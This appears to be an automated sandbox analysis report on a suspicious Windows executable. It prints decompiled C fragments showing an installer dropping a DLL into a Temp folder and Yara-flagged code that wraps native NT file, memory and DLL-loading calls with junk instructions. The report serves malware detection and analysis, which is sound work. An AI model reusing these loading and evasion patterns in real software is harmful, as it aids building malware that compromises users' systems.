                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CapsCreateDeviceFontIndirect
                      • String ID:
                      • API String ID: 3272661963-0
                      • Opcode ID: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                      • Instruction ID: 28934dfc7bc65fa7e96b773f26fd89147779a1e7d92ad1971070d574f64f8b8b
                      • Opcode Fuzzy Hash: 5bdeddeca4668f0a0f0504b7d7b2f7c507d3b1edf4264a992670beebdbd79f47
                      • Instruction Fuzzy Hash: 3AF0AFF0A48341AEE7009770AE1ABAA3B64A715305F104535F582BA1E2C6BC04159F3F
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00404D73(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                      				long _t22;
                      
                      				if(_a8 != 0x102) {
                      					if(_a8 != 0x200) {
                      						_t22 = _a16;
                      						L7:
                      						if(_a8 == 0x419 &&  *0x420480 != _t22) {
                      							 *0x420480 = _t22;
                      							E00405A85(0x420498, 0x424000);
                      							E004059E3(0x424000, _t22);
                      							E0040140B(6);
                      							E00405A85(0x424000, 0x420498);
                      						}
                      						L11:
                      						return CallWindowProcA( *0x420488, _a4, _a8, _a12, _t22);
                      					}
                      					if(IsWindowVisible(_a4) == 0) {
                      						L10:
                      						_t22 = _a16;
                      						goto L11;
                      					}
                      					_t22 = E004046F2(_a4, 1);
                      					_a8 = 0x419;
                      					goto L7;
                      				}
                      				if(_a12 != 0x20) {
                      					goto L10;
                      				}
                      				E00403E83(0x413);
                      				return 0;
                      			}





                      APIs
                      • IsWindowVisible.USER32 ref: 00404DA9
                      • CallWindowProcA.USER32 ref: 00404E17
                        • Part of subcall function 00403E83: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403E95
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: Window$CallMessageProcSendVisible
                      • String ID:
                      • API String ID: 3748168415-3916222277
                      • Opcode ID: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                      • Instruction ID: ec2fcea156de3e0d4d2633a939c9d5c5ec8f09c93be26486dc307f4b459a9b20
                      • Opcode Fuzzy Hash: 2cfa0dda5096fc282298ac24804e266d5556b05f30a7a7ef0aebc418f5cb8028
                      • Instruction Fuzzy Hash: B5116A71600208BBDB21AF51DC409AB3A69AB84769F00853AFB14691E2C3799D919FA9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004024B0(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                      				int _t5;
                      				long _t7;
                      				struct _OVERLAPPED* _t11;
                      				intOrPtr* _t15;
                      				void* _t17;
                      				int _t21;
                      
                      				_t15 = __esi;
                      				_t11 = __ebx;
                      				if( *((intOrPtr*)(_t17 - 0x1c)) == __ebx) {
                      					_t7 = lstrlenA(E004029E8(0x11));
                      				} else {
                      					E004029CB(1);
                      					 *0x409f68 = __al;
                      				}
                      				if( *_t15 == _t11) {
                      					L8:
                      					 *((intOrPtr*)(_t17 - 4)) = 1;
                      				} else {
                      					_t5 = WriteFile(E004059FC(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll", _t7, _t17 + 8, _t11);
                      					_t21 = _t5;
                      					if(_t21 == 0) {
                      						goto L8;
                      					}
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t17 - 4));
                      				return 0;
                      			}










                      APIs
                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024CE
                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll,00000000,?,?,00000000,00000011), ref: 004024ED
                      Strings
                      • C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll, xrefs: 004024BC, 004024E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileWritelstrlen
                      • String ID: C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dll
                      • API String ID: 427699356-1113509814
                      • Opcode ID: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                      • Instruction ID: fedee9c099d2663b98e8dec203c278837a510ba70d8909219c610135afd3ad6f
                      • Opcode Fuzzy Hash: a7a307b01d72905e0304e8920e0139a7d4e1dbb712e07632bb5d9222787a9c8a
                      • Instruction Fuzzy Hash: 89F0E9B2A44245BFD700EBF19E499AF36689B00345F20443BB141F50C2D6BC89419B2D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004055BF(char* _a4) {
                      				char* _t3;
                      				char* _t5;
                      
                      				_t5 = _a4;
                      				_t3 =  &(_t5[lstrlenA(_t5)]);
                      				while( *_t3 != 0x5c) {
                      					_t3 = CharPrevA(_t5, _t3);
                      					if(_t3 > _t5) {
                      						continue;
                      					}
                      					break;
                      				}
                      				 *_t3 =  *_t3 & 0x00000000;
                      				return  &(_t3[1]);
                      			}






                      APIs
                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nji3Lg1ot6.exe,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 004055C5
                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\nji3Lg1ot6.exe,C:\Users\user\Desktop\nji3Lg1ot6.exe,80000000,00000003), ref: 004055D3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: CharPrevlstrlen
                      • String ID: C:\Users\user\Desktop
                      • API String ID: 2709904686-1669384263
                      • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                      • Instruction ID: 41873d5d9910b4adf2dd72edffcb0a7ece880f135012a8254964d84567f142cd
                      • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                      • Instruction Fuzzy Hash: 54D05E62408AB02EE30252109C00B8F7A98CB16300F194462E040A6194C2784C418EB9
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004056D1(CHAR* _a4, CHAR* _a8) {
                      				int _t10;
                      				int _t15;
                      				CHAR* _t16;
                      
                      				_t15 = lstrlenA(_a8);
                      				_t16 = _a4;
                      				while(lstrlenA(_t16) >= _t15) {
                      					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                      					_t10 = lstrcmpiA(_t16, _a8);
                      					if(_t10 == 0) {
                      						return _t16;
                      					}
                      					_t16 = CharNextA(_t16);
                      				}
                      				return 0;
                      			}







                      APIs
                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
                      • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056F1
                      • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 004056FF
                      • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: lstrlen$CharNextlstrcmpi
                      • String ID:
                      • API String ID: 190613189-0
                      • Opcode ID: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                      • Instruction ID: ab644034e2f35de8b9eb45aecd4941bea8d0256c976e6660c88f08d3bba40562
                      • Opcode Fuzzy Hash: 0108cf067d6f6d80c8ed850288af8a4b3b9133f156f8bdff26d83f0dd252fb59
                      • Instruction Fuzzy Hash: 93F0A73620DD62DAC3125B695C44A6F6F94EF91314F14457AF440F3141D3359812ABBF
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Execution Graph

                      Execution Coverage:4.1%
                      Dynamic/Decrypted Code Coverage:2.7%
                      Signature Coverage:5.7%
                      Total number of Nodes:560
                      Total number of Limit Nodes:71

                      Graph


                      Executed Functions

                      Control-flow Graph

                      control_flow_graph 0 41a3fb-41a449 call 41af50 NtReadFile
                      APIs
                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: !JA$bMA$bMA
                      • API String ID: 2738559852-4222312340
                      • Opcode ID: bbedcce165141eae6f6c59c4a2154509f4d526a624f79bebf9a1775ec944f995
                      • Instruction ID: 49720b7d66a93349e3bd369c002c8e5e6a417abb72e5e273f09933de7181dcef
                      • Opcode Fuzzy Hash: bbedcce165141eae6f6c59c4a2154509f4d526a624f79bebf9a1775ec944f995
                      • Instruction Fuzzy Hash: E7F0F4B6200208AFCB14DF89CC91EEB77A9EF8C714F168259FE1D97241D630E811CBA0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 3 41a400-41a416 4 41a41c-41a449 NtReadFile 3->4 5 41a417 call 41af50 3->5 5->4
                      C-Code - Quality: 37%
                      			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                      				void* _t18;
                      				void* _t27;
                      				intOrPtr* _t28;
                      
                      				_t13 = _a4;
                      				_t28 = _a4 + 0xc48;
                      				E0041AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                      				_t4 =  &_a40; // 0x414a21
                      				_t6 =  &_a32; // 0x414d62
                      				_t12 =  &_a8; // 0x414d62
                      				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                      				return _t18;
                      			}







                      APIs
                      • NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: FileRead
                      • String ID: !JA$bMA$bMA
                      • API String ID: 2738559852-4222312340
                      • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                      • Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
                      • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                      • Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      control_flow_graph 244 40ace0-40acfc 245 40ad04-40ad09 244->245 246 40acff call 41cc40 244->246 247 40ad0b-40ad0e 245->247 248 40ad0f-40ad1d call 41d060 245->248 246->245 251 40ad2d-40ad30 248->251 252 40ad1f-40ad2a call 41d2e0 248->252 254 40ad36-40ad3e 251->254 255 40ad31 call 41b490 251->255 252->251 257 40ad40-40ad54 LdrLoadDll 254->257 258 40ad57-40ad5a 254->258 255->254 257->258
                      C-Code - Quality: 70%
                      			E0040ACE0(void* __eflags, void* _a4, signed char _a8) {
                      				char* _v8;
                      				struct _EXCEPTION_RECORD _v12;
                      				struct _OBJDIR_INFORMATION _v16;
                      				char _v536;
                      				void* _t15;
                      				struct _OBJDIR_INFORMATION _t17;
                      				struct _OBJDIR_INFORMATION _t18;
                      				intOrPtr _t28;
                      				void* _t30;
                      				void* _t31;
                      				void* _t32;
                      
                      				_t24 = _a8;
                      				_v8 =  &_v536;
                      				_t15 = E0041CC40( &_v12, 0x104, _a8);
                      				_t31 = _t30 + 0xc;
                      				if(_t15 != 0) {
                      					_push(_v8);
                      					_t17 = E0041D060(_t24, __eflags);
                      					_t32 = _t31 + 4;
                      					__eflags = _t17;
                      					if(_t17 != 0) {
                      						E0041D2E0( &_v12, 0);
                      						_t32 = _t32 + 8;
                      					}
                      					_t28 = _v8;
                      					asm("cld");
                      					_t18 = E0041B490(_t28);
                      					_v16 = _t18;
                      					__eflags = _t18;
                      					if(_t18 == 0) {
                      						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                      						return _v16;
                      					}
                      					return _t18;
                      				} else {
                      					return _t15;
                      				}
                      			}















                      APIs
                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: Load
                      • String ID:
                      • API String ID: 2234796835-0
                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction ID: d499f532a4605d4acc668fd39ab8700ce4e6b27de0f8ef54b1fb0fb48fae0bb4
                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                      • Instruction Fuzzy Hash: EF0152B5D4020DA7DB10EBA5DC42FDEB3789F14308F0041A5E908A7281F634EB54CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 259 41a34a-41a3a1 call 41af50 NtCreateFile
                      C-Code - Quality: 64%
                      			E0041A34A(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                      				long _t21;
                      				void* _t31;
                      
                      				asm("popfd");
                      				asm("repe sbb byte [ebp-0x74aaa25a], 0xec");
                      				_t15 = _a4;
                      				_t3 = _t15 + 0xc40; // 0xc40
                      				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                      				return _t21;
                      			}






                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 2a99a3c2f4766e3ff7701aeb918381754f39925105fc95cd78374fa7f9cf15e1
                      • Instruction ID: 5d37e0bc2e5497f3ba9e256379f8536d62525a8f8307c94596b62d97346bd883
                      • Opcode Fuzzy Hash: 2a99a3c2f4766e3ff7701aeb918381754f39925105fc95cd78374fa7f9cf15e1
                      • Instruction Fuzzy Hash: 5F01B2B2201108AFCB18CF99DC85EEB77A9AF8C754F15824CFA5D97291C630E851CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 262 41a350-41a366 263 41a36c-41a3a1 NtCreateFile 262->263 264 41a367 call 41af50 262->264 264->263
                      C-Code - Quality: 100%
                      			E0041A350(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                      				long _t21;
                      				void* _t31;
                      
                      				_t3 = _a4 + 0xc40; // 0xc40
                      				E0041AF50(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                      				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                      				return _t21;
                      			}






                      APIs
                      • NtCreateFile.NTDLL(00000060,00409CE3,?,00414BA7,00409CE3,FFFFFFFF,?,?,FFFFFFFF,00409CE3,00414BA7,?,00409CE3,00000060,00000000,00000000), ref: 0041A39D
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFile
                      • String ID:
                      • API String ID: 823142352-0
                      • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                      • Instruction ID: 880687b14e2bfdcefdfb108c829fe1d34a34742feba638e3287dae326a4d6923
                      • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                      • Instruction Fuzzy Hash: AAF0BDB2201208AFCB08CF89DC85EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 265 41a530-41a56d call 41af50 NtAllocateVirtualMemory
                      C-Code - Quality: 100%
                      			E0041A530(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                      				long _t14;
                      				void* _t21;
                      
                      				_t3 = _a4 + 0xc60; // 0xca0
                      				E0041AF50(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                      				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                      				return _t14;
                      			}






                      APIs
                      • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B124,?,00000000,?,00003000,00000040,00000000,00000000,00409CE3), ref: 0041A569
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateMemoryVirtual
                      • String ID:
                      • API String ID: 2167126740-0
                      • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                      • Instruction ID: 4e0f78fd3c2c10b6dba7ecb12144fed22081eaa1fb7babd41561f41a61d0d9a2
                      • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                      • Instruction Fuzzy Hash: A3F015B2200208AFCB14DF89CC81EEB77ADAF88754F118149BE1C97241C630F811CBA4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 271 41a47b-41a4a9 call 41af50 NtClose
                      C-Code - Quality: 43%
                      			E0041A47B(intOrPtr _a8, void* _a12) {
                      				long _t8;
                      				void* _t11;
                      
                      				_pop(_t11);
                      				asm("popfd");
                      				asm("daa");
                      				asm("insd");
                      				asm("fcom qword [ebp-0x75]");
                      				_t5 = _a8;
                      				_t2 = _t5 + 0x10; // 0x300
                      				_t3 = _t5 + 0xc50; // 0x40a933
                      				E0041AF50(_t11, _a8, _t3,  *_t2, 0, 0x2c);
                      				_t8 = NtClose(_a12); // executed
                      				return _t8;
                      			}






                      APIs
                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 96694a41f84103a2750570f19915e235cc2157ad943ab8566f94040f6eab9b6e
                      • Instruction ID: 224f3cab7641eba9fa5498746abd3f9922e224dbb1b3f46e5902b56a1c4f2db2
                      • Opcode Fuzzy Hash: 96694a41f84103a2750570f19915e235cc2157ad943ab8566f94040f6eab9b6e
                      • Instruction Fuzzy Hash: 04E08C75600200ABD720DFA9CC86EEB7B68EF84364F104199BA1DEB242C630A50186A0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0041A480(intOrPtr _a4, void* _a8) {
                      				long _t8;
                      				void* _t11;
                      
                      				_t5 = _a4;
                      				_t2 = _t5 + 0x10; // 0x300
                      				_t3 = _t5 + 0xc50; // 0x40a933
                      				E0041AF50(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                      				_t8 = NtClose(_a8); // executed
                      				return _t8;
                      			}






                      APIs
                      • NtClose.NTDLL(00414D40,?,?,00414D40,00409CE3,FFFFFFFF), ref: 0041A4A5
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close
                      • String ID:
                      • API String ID: 3535843008-0
                      • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                      • Instruction ID: 58703de6d0d09b45194c1a78dafb6a6614d70e6a8447524affba2eb7b0ba4c9c
                      • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                      • Instruction Fuzzy Hash: E9D01776200214ABD710EB99CC85EE77BACEF48764F154499BA1C9B242C530FA1086E4
                      Uniqueness

                      Uniqueness Score: -1.00%

                      APIs
                      Memory Dump Source
                      • Source File: 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_a00000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: InitializeThunk
                      • String ID:
                      • API String ID: 2994545307-0
                      • Opcode ID: a7135dc3db71b0ddbbd6337a84b692773aaa3db8ec3adf7391bd5761f7c35a1f
                      • Instruction ID: de06ef428b3e9f0451531bbbdcc1b2b873ccd55260525c79bff139edc965d7f2
                      • Opcode Fuzzy Hash: a7135dc3db71b0ddbbd6337a84b692773aaa3db8ec3adf7391bd5761f7c35a1f
                      • Instruction Fuzzy Hash: 0190026160100502E20271694804616001A9BD0381F91C032A1055555ECA658992F171
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                      • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                      • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                      • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      C-Code - Quality: 18%
                      			E0041A692(void* __ebx, void* __eflags, intOrPtr _a4, int _a8, char _a12, long _a16, long _a20) {
                      				intOrPtr* __esi;
                      				void* __ebp;
                      				void* _t18;
                      				void* _t20;
                      				void* _t22;
                      				void* _t25;
                      				void* _t26;
                      
                      				asm("in al, 0xf0");
                      				asm("adc cl, [ebx+0x6f]");
                      				if(__eflags <= 0) {
                      					__eflags =  *(__ebx + 0x55557d72) * 0xffffff8b;
                      					__ebp = __esp;
                      					__esi = _a4 + 0xc7c;
                      					ExitProcess(_a8);
                      				}
                      				 *((intOrPtr*)(_t20 - 0x73)) =  *((intOrPtr*)(_t20 - 0x73)) + _t22;
                      				 *((intOrPtr*)(_t26 + 0x50)) =  *((intOrPtr*)(_t26 + 0x50)) + _t22;
                      				E0041AF50(_t25);
                      				_t7 =  &_a12; // 0x414526
                      				_t18 = RtlAllocateHeap( *_t7, _a16, _a20); // executed
                      				return _t18;
                      			}











                      APIs
                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6C8
                      Strings
                      Memory Dump Source
                      • Source File: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_1_2_400000_nji3Lg1ot6.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateExitHeapProcess
                      • String ID: &EA
                      • API String ID: 1054155344-1330915590
                      • Opcode ID: 9ddf71653d483460c39806f305d76505489e6f16b7275dbe693c9e7e07c05345
                      • Instruction ID: d00da0fc24fa43dfddb9da27cb984b5bb85f809a5ccfa62c29cf1a0df3718626
                      • Opcode Fuzzy Hash: 9ddf71653d483460c39806f305d76505489e6f16b7275dbe693c9e7e07c05345
                      • Instruction Fuzzy Hash: BCF0AFB91042406FD710EF78CC91EEB7BA8AF48354F148599FC5C5B346C231E9158AA5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
